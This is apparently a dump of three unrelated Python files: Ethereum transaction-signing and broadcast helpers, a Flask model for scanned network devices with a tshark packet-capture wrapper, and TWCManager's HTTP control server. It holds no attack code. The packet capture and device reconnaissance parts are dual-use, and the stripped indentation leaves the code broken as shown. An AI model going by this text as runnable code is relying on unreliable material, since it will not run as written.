# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def ResultHandlerDelegate_DetermineHighestResult_int(resultDict):
highestResult = 0
# This function is great because it's going to look at the resultDict which contains many responses and iterate over them and look for the response with the highest result
# This works well for the getting the latest block number as well as getting the latest nonce. In both cases we want the highest value
responseOf_highestResult = None
for resultKey in resultDict:
# PrintAndLog_FuncNameHeader("resultKey = " + str(resultKey) + ": resultDict[resultKey] = " + str(resultDict[resultKey]))
if hasattr(resultDict[resultKey], 'content'):
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
# PrintAndLog_FuncNameHeader("jData = " + str(jData))
# If the result is valid
if 'result' in jData and jData['result'] and str(jData['result']).lower() != "null" and str(jData['result']).lower() != "none":
result = ConvertHexToInt(jData['result'])
# PrintAndLog_FuncNameHeader("jData['result'] = " + str(jData['result']) + ", " + str(result) + " " + str(resultKey))
if result > highestResult:
# PrintAndLog_FuncNameHeader("found a new highest result " + str(result) + ", " + str(resultKey))
highestResult = result
responseOf_highestResult = resultDict[resultKey]
# else:
# PrintAndLog_FuncNameHeader("found a result " + str(
# result) + ", but it didn't exceed our current highest of " + str(highestResult) + " " + str(resultKey))
return responseOf_highestResult
def API_SendRawTransaction_ToManyRemoteNodes(transactionData):
from Libraries.nodes import RemoteNodeList
threads = []
resultsDict = {}
# Send to all standard RPC nodes
for remoteNode in RemoteNodeList:
key = str(remoteNode.name)
t = threading.Thread(target=API_PostSendRawTransaction_StandardRPC, args=(transactionData, Get_RemoteEthereumNodeToUse(remoteNode), resultsDict, key))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print("resultsDict = " + str(resultsDict))
# print("resultsDict.values() = " + str(resultsDict.values()))
numOfTransactionIdsInResultsDict = 0
for key, txId in list(resultsDict.items()):
if IsStringATransactionId(txId):
numOfTransactionIdsInResultsDict += 1
print("numOfTransactionIdsInResultsDict = " + str(numOfTransactionIdsInResultsDict))
# If all of these responses are the same, then we can just reference the first one
if AllListItemsAreTheSame(list(resultsDict.values())):
print("All items are the same")
txId = list(resultsDict.values())[0]
if IsStringATransactionId(txId):
print("Using txId = " + txId)
return txId, None
else:
message = "API_PostSendRawTransaction_ToManyRemoteNodes invalid txId (A) " + str(txId)
print(message)
# All responses are not the same
else:
print("All items are NOT the same")
for key, txId in list(resultsDict.items()):
if IsStringATransactionId(txId):
print("Using txId = " + txId)
return txId, None
else:
message = "API_PostSendRawTransaction_ToManyRemoteNodes invalid txId (B) " + str(txId)
print(message)
return None, None
def API_PostSendRawTransaction_StandardRPC(transactionData, url, result, key):
shortName = url[0:20]
result[key] = None
try:
payload = {
"id": randint(0, 99999999999999),
"jsonrpc": "2.0",
"method": "eth_sendRawTransaction",
"params": [
"0x" + transactionData
]
}
# print("API_PostSendRawTransaction_StandardRPC " + shortName)
response = requests.post(url, data=json.dumps(payload), headers=Headers, timeout=RequestTimeout_seconds)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
print("API_PostSendRawTransaction_StandardRPC " + shortName + " jData = " + str(jData))
if 'error' in jData:
errorMessage = jData['error']['message']
errorCode = jData['error']['code']
# print("API_PostSendRawTransaction_StandardRPC " + shortName + " errorMessage: " + errorMessage + ". errorCode: " + str(errorCode))
result[key] = jData['error']
elif 'result' in jData:
# print("API_PostSendRawTransaction_StandardRPC " + shortName + " jData = " + str(jData))
transactionId = str(jData['result'])
result[key] = transactionId
else:
print("No error or result in the response!")
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
except:
print("exception = " + traceback.format_exc())
pass
return result
def API_EstimateGas(toAddress, fromAddress, data, value=0, doAddExtraGasPadding=True, multiplier=1.22, timeout=RequestTimeout_seconds):
value_hex = '0x' + ConvertIntToHex(int(value))
payload = {
"jsonrpc": "2.0",
"method": "eth_estimateGas",
"params": [
{
"data": data,
"to": toAddress,
"from": fromAddress,
"value": value_hex,
},
]
}
if not toAddress:
del payload['params'][0]['to']
print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, timeout)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
# print("jData = " + str(jData))
estimatedGasUsage_wei = ConvertHexToInt(jData['result'])
# print("estimatedGasUsage_wei = " + str(estimatedGasUsage_wei))
if doAddExtraGasPadding:
estimatedGasUsage_wei = int(estimatedGasUsage_wei * multiplier)
# print("adding some extra gas as padding, estimatedGasUsage_wei = " + str(
# estimatedGasUsage_wei) + " after a multiplier of " + str(multiplier) + " was used")
return estimatedGasUsage_wei
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def IsAddressAValidDeployedContract(toAddress):
try:
result = API_GetCode(toAddress)
if result != '0x':
return True
except (KeyboardInterrupt, SystemExit):
print('\nkeyboard interrupt caught')
print('\n...Program Stopped Manually!')
raise
except:
message = "exception: " + traceback.format_exc()
print(message)
pass
return False
def API_GetCode(toAddress):
payload = {
"jsonrpc": "2.0",
"method": "eth_getCode",
"params": [
toAddress,
]
}
# print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, RequestTimeout_seconds)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
return jData['result']
else:
# If response code is not ok (200), print the resulting http error code with description
response.raise_for_status()
def SignTransaction(to, value, privkey, nonce=0, gas_int=21000, gasPrice_int=1010000000, data_hex=""):
# print("SignTransaction gasPrice_int = " + str(ConvertWeiToGwei(gasPrice_int)) + " gwei")
if not isinstance(gasPrice_int, int):
raise Exception("gasPrice_int must be of type int")
if gasPrice_int <= 0:
raise Exception("gasPrice_int cannot be negative or zero")
if not isinstance(gas_int, int):
raise Exception("gas_int must be of type int")
if gas_int <= 0:
raise Exception("gas_int cannot be negative or zero")
try:
data_hex_with0xRemoved = data_hex.replace("0x", "")
data = bytes.fromhex(data_hex_with0xRemoved)
# Results in {'error': True, 'message': ObjectSerializationError('Serialization failed because of field data ("Object is not a serializable (<class \'bytearray\'>)")',)}
# data = bytearray.fromhex('deadbeef')
# print("SignTransaction data = " + str(data))
unsigned_transaction = transactions.Transaction(nonce, gasPrice_int, gas_int, to, value, data)
# print("unsigned_transaction = " + str(unsigned_transaction))
raw_transaction_bytes = rlp.encode(unsigned_transaction.sign(privkey))
# print("raw_transaction_bytes = " + str(raw_transaction_bytes))
raw_transaction_hex = Web3.toHex(raw_transaction_bytes)
# print("raw_transaction_hex = " + str(raw_transaction_hex))
raw_transaction_hex_0xRemoved = raw_transaction_hex.replace("0x", "")
# print("raw_transaction_hex_0xRemoved = " + raw_transaction_hex_0xRemoved)
return {'error': False, 'sign': raw_transaction_hex_0xRemoved}
except Exception as msg:
return {'error': True, 'message': msg}
def GetNullAddress():
# NullAddress = Instance_Web3.toChecksumAddress("0x0000000000000000000000000000000000000000")
from Libraries.nodes import Instance_Web3
return Instance_Web3.toChecksumAddress("0x0000000000000000000000000000000000000000")
def GetEtherContractAddress():
# EtherContractAddress = NullAddress
return GetNullAddress()
def GetAddressFromDataProperty(dataProperty):
return '0x' + dataProperty[-LengthOfPublicAddress_Excludes0x:]
def SplitStringIntoChunks(myStringIWantToSplit, splitLength):
splitArray = [myStringIWantToSplit[i:i + splitLength] for i in range(0, len(myStringIWantToSplit), splitLength)]
return splitArray
def ConvertGweiToWei(gwei):
return int(gwei * 1000000000)
def ConvertWeiToGwei(wei):
return wei / float(1000000000)
def ConvertHexToInt(hex):
return int(hex, 16)
def IsStringATransactionId(myString):
if not myString:
return False
if "0x" in str(myString) and len(str(myString)) != LengthOfTransactionHash_Including0x:
return False
if "0x" not in str(myString) and len(str(myString)) != LengthOfTransactionHash_Excludes0x:
return False
return True
def AllListItemsAreTheSame(items):
return all(x == items[0] for x in items)
|
models.py
|
from flask_sqlalchemy import SQLAlchemy
from threading import Thread
import subprocess
import shlex
import sys
import io
import json
from encoder import JsonEncodedDict
from pathlib import Path
from datetime import datetime
db = SQLAlchemy()
class Devices(db.Model):
__tablename__ = 'devices'
public_ip = db.Column(db.String(15), db.ForeignKey('networks.public_ip'))
device_ip = db.Column(db.String(15), primary_key=True)
port_status = db.Column(db.String(100))
MAC_address = db.Column(db.String(17))
manufacturer = db.Column(db.String(100))
service_info = db.Column(db.String(150))
os_details = db.Column(db.String(150))
open_ports = db.Column(JsonEncodedDict)
warnings = db.Column(db.String(150))
def __init__(self, public_ip, device_ip, port_status, MAC_address, manufacturer, service_info, os_details, open_ports, warnings):
self.public_ip = public_ip
self.device_ip = device_ip
self.port_status = port_status
self.MAC_address = MAC_address
self.manufacturer = manufacturer
self.service_info = service_info
self.os_details = os_details
self.open_ports = open_ports
self.warnings = warnings
class Network(db.Model):
__tablename__ = 'networks'
public_ip = db.Column(db.String(15), primary_key=True)
ip_country = db.Column(db.String(100))
country_cc = db.Column(db.String(5))
gateway_ip = db.Column(db.String(15))
def __init__(self, public_ip, ip_country, country_cc, gateway_ip):
self.public_ip = public_ip
self.ip_country = ip_country
self.country_cc = country_cc
self.gateway_ip = gateway_ip
class PacketSniffer:
def run_tshark(self, args):
print("tshark test with {}.".format(args[0]))
filepath = args[1]
cmd = "tshark -l -i " + args[0] + " -w " + filepath
run_args = shlex.split(cmd)
tshark = subprocess.Popen(run_args, stdout=subprocess.PIPE)
def run(self, args):
try:
t = Thread(target=self.run_tshark, args=(args, ))
t.daemon = True
t.start()
t.join()
except Exception as e:
return str(e)
|
HTTPControl.py
|
import logging
import mimetypes
import os
import pathlib
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from datetime import datetime, timedelta
import jinja2
import json
import re
import threading
import time
import urllib.parse
import uuid
import math
from ww import f
logger = logging.getLogger(__name__.rsplit(".")[-1])
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class HTTPControl:
configConfig = {}
configHTTP = {}
httpPort = 8080
master = None
status = False
def __init__(self, master):
self.master = master
try:
self.configConfig = master.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHTTP = master.config["control"]["HTTP"]
except KeyError:
self.configHTTP = {}
self.httpPort = self.configHTTP.get("listenPort", 8080)
self.status = self.configHTTP.get("enabled", False)
# Unload if this module is disabled or misconfigured
if (not self.status) or (int(self.httpPort) < 1):
self.master.releaseModule("lib.TWCManager.Control", self.__class__.__name__)
return None
HTTPHandler = CreateHTTPHandlerClass(master)
httpd = None
try:
httpd = ThreadingSimpleServer(("", self.httpPort), HTTPHandler)
except OSError as e:
logger.error("Unable to start HTTP Server: " + str(e))
if httpd:
logger.info("Serving at port: " + str(self.httpPort))
threading.Thread(target=httpd.serve_forever, daemon=True).start()
else:
self.master.releaseModule("lib.TWCManager.Control", self.__class__.__name__)
def CreateHTTPHandlerClass(master):
class HTTPControlHandler(BaseHTTPRequestHandler):
ampsList = []
fields = {}
hoursDurationList = []
master = None
path = ""
post_data = ""
templateEnv = None
templateLoader = None
timeList = []
url = None
def __init__(self, *args, **kwargs):
# Populate ampsList so that any function which requires a list of supported
# TWC amps can easily access it
if not len(self.ampsList):
self.ampsList.append([0, "Disabled"])
for amp in range(
5, (master.config["config"].get("wiringMaxAmpsPerTWC", 5)) + 1
):
self.ampsList.append([amp, str(amp) + "A"])
# Populate list of hours
if not len(self.hoursDurationList):
for hour in range(1, 25):
self.hoursDurationList.append([(hour * 3600), str(hour) + "h"])
if not len(self.timeList):
for hour in range(0, 24):
for mins in [0, 15, 30, 45]:
strHour = str(hour)
strMins = str(mins)
if hour < 10:
strHour = "0" + str(hour)
if mins < 10:
strMins = "0" + str(mins)
self.timeList.append(
[strHour + ":" + strMins, strHour + ":" + strMins]
)
# Define jinja2 template environment
# Note that we specify two paths in order to the template loader.
# The first is the user specified template. The second is the default.
# Jinja2 will try for the specified template first, however if any files
# are not found, it will fall back to the default theme.
self.templateLoader = jinja2.FileSystemLoader(
searchpath=[
pathlib.Path(__file__).resolve().parent.as_posix()
+ "/themes/"
+ master.settings.get("webControlTheme", "Modern")
+ "/",
pathlib.Path(__file__).resolve().parent.as_posix()
+ "/themes/Default/",
]
)
self.templateEnv = jinja2.Environment(
loader=self.templateLoader, autoescape=True
)
# Make certain functions available to jinja2
# Where we have helper functions that we've used in the fast to
# render HTML, we can keep using those even inside jinja2
self.templateEnv.globals.update(addButton=self.addButton)
self.templateEnv.globals.update(ampsList=self.ampsList)
self.templateEnv.globals.update(chargeScheduleDay=self.chargeScheduleDay)
self.templateEnv.globals.update(checkBox=self.checkBox)
self.templateEnv.globals.update(doChargeSchedule=self.do_chargeSchedule)
self.templateEnv.globals.update(
getMFADevices=master.getModuleByName("TeslaAPI").getMFADevices
)
self.templateEnv.globals.update(hoursDurationList=self.hoursDurationList)
self.templateEnv.globals.update(navbarItem=self.navbar_item)
self.templateEnv.globals.update(optionList=self.optionList)
self.templateEnv.globals.update(timeList=self.timeList)
# Set master object
self.master = master
# Call parent constructor last, this is where the request is served
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def checkBox(self, name, value):
cb = "<input type=checkbox name='" + name + "'"
if value:
cb += " checked"
cb += ">"
return cb
def do_chargeSchedule(self):
schedule = [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
]
settings = master.settings.get("Schedule", {})
page = """
<table class='table table-sm'>
<thead>
<th scope='col'> </th>
"""
for day in schedule:
page += "<th scope='col'>" + day[:3] + "</th>"
page += """
</thead>
<tbody>"""
for i in (x for y in (range(6, 24), range(0, 6)) for x in y):
page += "<tr><th scope='row'>%02d</th>" % (i)
for day in schedule:
today = settings.get(day, {})
curday = settings.get("Common", {})
if settings.get("schedulePerDay", 0):
curday = settings.get(day, {})
if (
today.get("enabled", None) == "on"
and (int(curday.get("start", 0)[:2]) <= int(i))
and (int(curday.get("end", 0)[:2]) >= int(i))
):
page += (
"<td bgcolor='#CFFAFF'>SC @ "
+ str(
settings.get("Settings", {}).get("scheduledAmpsMax", 0)
)
+ "A</td>"
)
else:
# Todo - need to mark track green + non scheduled chg
page += "<td bgcolor='#FFDDFF'> </td>"
page += "</tr>"
page += "</tbody>"
page += "</table>"
return page
def navbar_item(self, url, name, target="_self"):
active = ""
urlp = urllib.parse.urlparse(self.path)
if urlp.path == url:
active = "active"
page = "<li class='nav-item %s'>" % active
page += "<a class='nav-link' target='%s' href='%s'>%s</a>" % (
target,
url,
name,
)
page += "</li>"
return page
def do_API_GET(self):
self.debugLogAPI("Starting API GET")
if self.url.path == "/api/getConfig":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(master.config)
# Scrub output of passwords and API keys
json_datas = re.sub(r'"password": ".*?",', "", json_data)
json_data = re.sub(r'"apiKey": ".*?",', "", json_datas)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getConsumptionOffsets":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
if not master.settings.get("consumptionOffset", None):
master.settings["consumptionOffset"] = {}
json_data = json.dumps(master.settings["consumptionOffset"])
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getLastTWCResponse":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(str(master.lastTWCResponseMsg).encode("utf-8"))
elif self.url.path == "/api/getPolicy":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(master.getModuleByName("Policy").charge_policy)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getSlaveTWCs":
data = {}
totals = {
"lastAmpsOffered": 0,
"lifetimekWh": 0,
"maxAmps": 0,
"reportedAmpsActual": 0,
}
for slaveTWC in master.getSlaveTWCs():
TWCID = "%02X%02X" % (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
data[TWCID] = {
"currentVIN": slaveTWC.currentVIN,
"lastAmpsOffered": round(slaveTWC.lastAmpsOffered, 2),
"lastHeartbeat": round(time.time() - slaveTWC.timeLastRx, 2),
"carsCharging": slaveTWC.isCharging,
"lastVIN": slaveTWC.lastVIN,
"lifetimekWh": slaveTWC.lifetimekWh,
"maxAmps": float(slaveTWC.maxAmps),
"reportedAmpsActual": float(slaveTWC.reportedAmpsActual),
"chargerLoadInW": round(slaveTWC.getCurrentChargerLoad()),
"state": slaveTWC.reportedState,
"version": slaveTWC.protocolVersion,
"voltsPhaseA": slaveTWC.voltsPhaseA,
"voltsPhaseB": slaveTWC.voltsPhaseB,
"voltsPhaseC": slaveTWC.voltsPhaseC,
"TWCID": "%s" % TWCID,
}
if slaveTWC.lastChargingStart > 0:
data[TWCID]["chargeTime"] = str(
timedelta(
seconds=(time.time() - slaveTWC.lastChargingStart)
)
).split(".")[0]
else:
data[TWCID]["chargeTime"] = "--:--:--"
# Adding some vehicle data
vehicle = slaveTWC.getLastVehicle()
if vehicle != None:
data[TWCID]["lastBatterySOC"] = vehicle.batteryLevel
data[TWCID]["lastChargeLimit"] = vehicle.chargeLimit
data[TWCID]["lastAtHome"] = vehicle.atHome
data[TWCID]["lastTimeToFullCharge"] = vehicle.timeToFullCharge
totals["lastAmpsOffered"] += slaveTWC.lastAmpsOffered
totals["lifetimekWh"] += slaveTWC.lifetimekWh
totals["maxAmps"] += slaveTWC.maxAmps
totals["reportedAmpsActual"] += slaveTWC.reportedAmpsActual
data["total"] = {
"lastAmpsOffered": round(totals["lastAmpsOffered"], 2),
"lifetimekWh": totals["lifetimekWh"],
"maxAmps": totals["maxAmps"],
"reportedAmpsActual": round(totals["reportedAmpsActual"], 2),
"TWCID": "total",
}
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getStatus":
data = master.getStatus()
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
try:
self.wfile.write(json_data.encode("utf-8"))
except BrokenPipeError:
self.debugLogAPI("Connection Error: Broken Pipe")
elif self.url.path == "/api/getHistory":
output = []
now = datetime.now().replace(second=0, microsecond=0).astimezone()
startTime = now - timedelta(days=2) + timedelta(minutes=5)
endTime = now.replace(minute=math.floor(now.minute / 5) * 5)
startTime = startTime.replace(
minute=math.floor(startTime.minute / 5) * 5
)
source = (
master.settings["history"] if "history" in master.settings else []
)
data = {
k: v for k, v in source if datetime.fromisoformat(k) >= startTime
}
avgCurrent = 0
for slave in master.getSlaveTWCs():
avgCurrent += slave.historyAvgAmps
data[endTime.isoformat(timespec="seconds")] = master.convertAmpsToWatts(
avgCurrent
)
output = [
{
"timestamp": timestamp,
"charger_power": data[timestamp] if timestamp in data else 0,
}
for timestamp in [
(startTime + timedelta(minutes=5 * i)).isoformat(
timespec="seconds"
)
for i in range(48 * 12)
]
]
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(output)
self.wfile.write(json_data.encode("utf-8"))
elif self.url.path == "/api/getUUID":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(str(uuid.getnode()).encode("utf-8"))
else:
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
self.debugLogAPI("Ending API GET")
def do_API_POST(self):
self.debugLogAPI("Starting API POST")
if self.url.path == "/api/addConsumptionOffset":
data = {}
try:
data = json.loads(self.post_data.decode("UTF-8"))
except (ValueError, UnicodeDecodeError):
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
except json.decoder.JSONDecodeError:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
name = str(data.get("offsetName", None))
value = float(data.get("offsetValue", 0))
unit = str(data.get("offsetUnit", ""))
if (
name
and value
and (unit == "A" or unit == "W")
and len(name) < 32
and not self.checkForUnsafeCharactters(name)
):
if not master.settings.get("consumptionOffset", None):
master.settings["consumptionOffset"] = {}
master.settings["consumptionOffset"][name] = {}
master.settings["consumptionOffset"][name]["value"] = value
master.settings["consumptionOffset"][name]["unit"] = unit
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/chargeNow":
data = {}
try:
data = json.loads(self.post_data.decode("UTF-8"))
except (ValueError, UnicodeDecodeError):
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
except json.decoder.JSONDecodeError:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
rate = int(data.get("chargeNowRate", 0))
durn = int(data.get("chargeNowDuration", 0))
if rate <= 0 or durn <= 0:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
master.setChargeNowAmps(rate)
master.setChargeNowTimeEnd(durn)
master.queue_background_task({"cmd": "saveSettings"})
master.getModuleByName("Policy").applyPolicyImmediately()
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/cancelChargeNow":
master.resetChargeNowAmps()
master.queue_background_task({"cmd": "saveSettings"})
master.getModuleByName("Policy").applyPolicyImmediately()
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/checkArrival":
master.queue_background_task({"cmd": "checkArrival"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/checkDeparture":
master.queue_background_task({"cmd": "checkDeparture"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/deleteConsumptionOffset":
data = json.loads(self.post_data.decode("UTF-8"))
name = str(data.get("offsetName", None))
if master.settings.get("consumptionOffset", None):
del master.settings["consumptionOffset"][name]
self.send_response(204)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
elif self.url.path == "/api/saveSettings":
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendDebugCommand":
data = json.loads(self.post_data.decode("UTF-8"))
packet = {"Command": data.get("commandName", "")}
if data.get("commandName", "") == "Custom":
packet["CustomCommand"] = data.get("customCommand", "")
# Clear last TWC response, so we can grab the next response
master.lastTWCResponseMsg = bytearray()
# Send packet to network
master.getModuleByName("RS485").send(
master.getModuleByName("TWCProtocol").createMessage(packet)
)
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendStartCommand":
master.sendStartCommand()
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/sendStopCommand":
master.sendStopCommand()
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/setSetting":
data = json.loads(self.post_data.decode("UTF-8"))
setting = str(data.get("setting", None))
value = str(data.get("value", None))
if (
setting
and value
and not self.checkForUnsafeCharactters(setting)
and not self.checkForUnsafeCharactters(value)
):
master.settings[setting] = value
self.send_response(204)
self.end_headers()
elif self.url.path == "/api/setScheduledChargingSettings":
data = json.loads(self.post_data.decode("UTF-8"))
enabled = bool(data.get("enabled", False))
startingMinute = int(data.get("startingMinute", -1))
endingMinute = int(data.get("endingMinute", -1))
monday = bool(data.get("monday", False))
tuesday = bool(data.get("tuesday", False))
wednesday = bool(data.get("wednesday", False))
thursday = bool(data.get("thursday", False))
friday = bool(data.get("friday", False))
saturday = bool(data.get("saturday", False))
sunday = bool(data.get("sunday", False))
amps = int(data.get("amps", -1))
batterySize = int(
data.get("flexBatterySize", 100)
) # using 100 as default, because with this every available car at moment should be finished with charging at the ending time
flexStart = int(data.get("flexStartEnabled", False))
weekDaysBitmap = (
(1 if monday else 0)
+ (2 if tuesday else 0)
+ (4 if wednesday else 0)
+ (8 if thursday else 0)
+ (16 if friday else 0)
+ (32 if saturday else 0)
+ (64 if sunday else 0)
)
if (
not (enabled)
or startingMinute < 0
or endingMinute < 0
or amps <= 0
or weekDaysBitmap == 0
):
master.setScheduledAmpsMax(0)
master.setScheduledAmpsStartHour(-1)
master.setScheduledAmpsEndHour(-1)
master.setScheduledAmpsDaysBitmap(0)
else:
master.setScheduledAmpsMax(amps)
master.setScheduledAmpsStartHour(startingMinute / 60)
master.setScheduledAmpsEndHour(endingMinute / 60)
master.setScheduledAmpsDaysBitmap(weekDaysBitmap)
master.setScheduledAmpsBatterySize(batterySize)
master.setScheduledAmpsFlexStart(flexStart)
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
self.debugLogAPI("Ending API POST")
def do_get_policy(self):
page = """
<table>
"""
j = 0
mod_policy = master.getModuleByName("Policy")
insertion_points = {0: "Emergency", 1: "Before", 3: "After"}
replaced = all(
x not in mod_policy.default_policy for x in mod_policy.charge_policy
)
for policy in mod_policy.charge_policy:
if policy in mod_policy.default_policy:
cat = "Default"
ext = insertion_points.get(j, None)
if ext:
page += "<tr><th>Policy Extension Point</th></tr>"
page += "<tr><td>" + ext + "</td></tr>"
j += 1
else:
cat = "Custom" if replaced else insertion_points.get(j, "Unknown")
page += (
"<tr><td> </td><td>"
+ policy["name"]
+ " ("
+ cat
+ ")</td></tr>"
)
page += "<tr><th> </th><th> </th><th>Match Criteria</th><th>Condition</th><th>Value</th></tr>"
for match, condition, value in zip(
policy["match"], policy["condition"], policy["value"]
):
page += "<tr><td> </td><td> </td>"
page += "<td>" + str(match)
match_result = mod_policy.policyValue(match)
if match != match_result:
page += " (" + str(match_result) + ")"
page += "</td>"
page += "<td>" + str(condition) + "</td>"
page += "<td>" + str(value)
value_result = mod_policy.policyValue(value)
if value != value_result:
page += " (" + str(value_result) + ")"
page += "</td></tr>"
page += """
</table>
</div>
</body>
"""
return page
def do_GET(self):
self.url = urllib.parse.urlparse(self.path)
# serve local static content files (from './lib/TWCManager/Control/static/' dir)
if self.url.path.startswith("/static/"):
content_type = mimetypes.guess_type(self.url.path)[0]
# only server know content type
if content_type is not None:
filename = (
pathlib.Path(__file__).resolve().parent.as_posix()
+ self.url.path
)
# check if static file exists and is readable
if os.path.isfile(filename) and os.access(filename, os.R_OK):
self.send_response(200)
self.send_header("Content-type", content_type)
self.end_headers()
# send static content (e.g. images) to browser
with open(filename, "rb") as staticFile:
self.wfile.write(staticFile.read())
return
else:
# static file doesn't exit or isn't readable
self.send_response(404)
return
# Service API requests
if self.url.path.startswith("/api/"):
self.do_API_GET()
return
webroutes = [
{"route": "/debug", "tmpl": "debug.html.j2"},
{"route": "/schedule", "tmpl": "schedule.html.j2"},
{"route": "/settings", "tmpl": "settings.html.j2"},
{"route": "/teslaAccount/login", "error": "insecure"},
{"route": "/teslaAccount/mfaCode", "error": "insecure"},
{"route": "/teslaAccount/submitCaptcha", "error": "insecure"},
{"rstart": "/teslaAccount", "tmpl": "main.html.j2"},
{"rstart": "/vehicleDetail", "tmpl": "vehicleDetail.html.j2"},
{"route": "/vehicles", "tmpl": "vehicles.html.j2"},
]
if self.url.path == "/teslaAccount/getCaptchaImage":
self.send_response(200)
self.send_header("Content-type", "image/svg+xml")
self.end_headers()
self.wfile.write(master.getModuleByName("TeslaAPI").getCaptchaImage())
return
if self.url.path == "/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load "main" template and render
self.template = self.templateEnv.get_template("main.html.j2")
# Set some values that we use within the template
# Check if we're able to access the Tesla API
self.apiAvailable = master.getModuleByName(
"TeslaAPI"
).car_api_available()
self.scheduledAmpsMax = master.getScheduledAmpsMax()
# Send the html message
page = self.template.render(vars(self))
self.wfile.write(page.encode("utf-8"))
return
# Match web routes to defined webroutes routing
route = None
for webroute in webroutes:
if self.url.path == webroute.get("route", "INVALID"):
route = webroute
break
elif self.url.path.startswith(webroute.get("rstart", "INVALID")):
route = webroute
break
if route and route.get("error", None):
if route["error"] == "insecure":
# For security, these details should be submitted via a POST request
# Send a 405 Method Not Allowed in response.
self.send_response(405)
page = (
"This function may only be requested via the POST HTTP method."
)
self.wfile.write(page.encode("utf-8"))
return
else:
self.send_response(500)
self.wfile.write("".encode("utf-8"))
return
elif route:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load debug template and render
self.template = self.templateEnv.get_template(route["tmpl"])
page = self.template.render(self.__dict__)
self.wfile.write(page.encode("utf-8"))
return
if self.url.path == "/policy":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load policy template and render
self.template = self.templateEnv.get_template("policy.html.j2")
page = self.template.render(self.__dict__)
page += self.do_get_policy()
self.wfile.write(page.encode("utf-8"))
return
if self.url.path.startswith("/vehicles/deleteGroup"):
group = urllib.parse.unquote(self.url.path.rsplit("/", 1)[1])
if (
group
and len(group) > 0
and group in master.settings["VehicleGroups"]
):
del master.settings["VehicleGroups"][group]
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(302)
self.send_header("Location", "/vehicles")
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/graphs" or self.url.path == "/graphsP":
# We query the last 24h by default
now = datetime.now().replace(second=0, microsecond=0)
initial = now - timedelta(hours=24)
end = now
# It we came from a POST the dates should be already stored in settings
if self.url.path == "/graphs":
self.process_save_graphs(
str(initial.strftime("%Y-%m-%dT%H:%M")),
str(end.strftime("%Y-%m-%dT%H:%M")),
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load debug template and render
self.template = self.templateEnv.get_template("graphs.html.j2")
page = self.template.render(self.__dict__)
self.wfile.write(page.encode("utf-8"))
return
if self.url.path == "/graphs/date":
inicio = master.settings["Graphs"]["Initial"]
fin = master.settings["Graphs"]["End"]
self.process_graphs(inicio, fin)
return
# All other routes missed, return 404
self.send_response(404)
def do_POST(self):
# Parse URL
self.url = urllib.parse.urlparse(self.path)
# Parse POST parameters
self.fields.clear()
length = int(self.headers.get("content-length"))
self.post_data = self.rfile.read(length)
